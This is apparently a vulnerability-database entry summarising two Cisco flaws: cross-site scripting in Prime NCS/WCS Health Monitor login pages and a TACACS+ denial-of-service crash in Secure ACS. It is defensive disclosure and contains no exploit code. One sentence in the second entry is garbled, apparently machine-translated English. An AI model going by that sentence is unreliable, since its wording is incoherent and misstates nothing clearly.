Multiple cross-site scripting (XSS) vulnerabilities in Health Monitor Login pages in Cisco Prime Network Control System (NCS) and Wireless Control System (WCS) allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug ID CSCud18375. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue is being tracked by Cisco Bug ID CSCud18375. Remote attackers can exploit this vulnerability to inject arbitrary Web scripts or HTML into user pages

Cisco Secure Access Control System (ACS) does not properly handle requests to read from the TACACS+ socket, which allows remote attackers to cause a denial of service (process crash) via malformed TCP packets, aka Bug ID CSCuh12488. Vendors have confirmed this vulnerability Bug ID CSCuh12488 It is released as.Malformed by a third party TCP Service disruption via packets ( Process crash ) There is a possibility of being put into a state. Cisco Secure Access Control System is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to crash a runtime process, resulting in denial-of-service conditions. This issue is being tracked by Cisco Bug ID CSCuh12488. The system can respectively control network access and network device access through RADIUS and TACACS protocols